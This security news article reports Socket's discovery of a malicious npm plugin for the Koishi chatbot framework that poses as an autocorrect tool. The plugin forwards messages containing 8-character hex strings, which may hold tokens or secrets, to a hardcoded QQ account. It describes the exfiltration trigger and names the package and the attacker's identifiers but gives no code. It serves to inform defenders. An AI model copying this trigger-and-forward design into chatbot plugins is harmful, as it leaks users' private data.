Ddos 
Socket’s Threat Research Team has uncovered a dangerous new threat lurking in the npm ecosystem: a malicious Koishi plugin masquerading as a helpful spelling autocorrect tool. Dubbed koishi-plugin-pinhaofa, the package installs a covert data exfiltration backdoor into chatbots built with the Koishi framework, silently leaking sensitive user messages to a hardcoded Tencent QQ account.
Koishi is a versatile TypeScript chatbot framework that supports popular platforms like QQ, Telegram, and Discord, enabling developers to build bots that share a single codebase. With over 1,000 community plugins available, Koishi has seen rapid adoption—making it a ripe target for malicious actors.
The malicious plugin takes advantage of how Koishi plugins are executed inside the bot’s runtime, granting them unrestricted access to read or modify every message.
At the core of the attack is a cleverly simple trigger: the plugin scans all incoming messages for 8-character hexadecimal strings, such as:
- Git commit hashes
- Truncated JWT or API tokens
- CRC-32 checksums
- Device serial numbers
When a match is found, the full message—including any embedded secrets or credentials—is forwarded to QQ user ID 1821181277. The message might include:
- Banking transaction hashes or card digits
- E-commerce order links with session tokens
- Healthcare identifiers or appointment codes
“The narrow trigger pulls in these high value artifacts while generating few false positives, keeping the threat actor’s inbox relevant and manageable” Socket notes.
The package was published on npm by a user with the alias kuminfennel, using the QQ-linked email 1821181277@qq.com and a matching GitHub account. Despite the malicious intent, the package remains publicly available on both npm and GitHub at the time of writing.
“The threat actor succeeds by exploiting three conditions: Koishi loads every plugin directly inside the bot process, npm provides wide and convenient distribution, and developers often install helper plugins without rigorous review,” Socket explains.
Once installed, koishi-plugin-pinhaofa:
- Exfiltrates sensitive user data in real time
- Blends into normal chatbot traffic
- Can cause major GDPR, HIPAA, or PCI-DSS compliance violations
Donate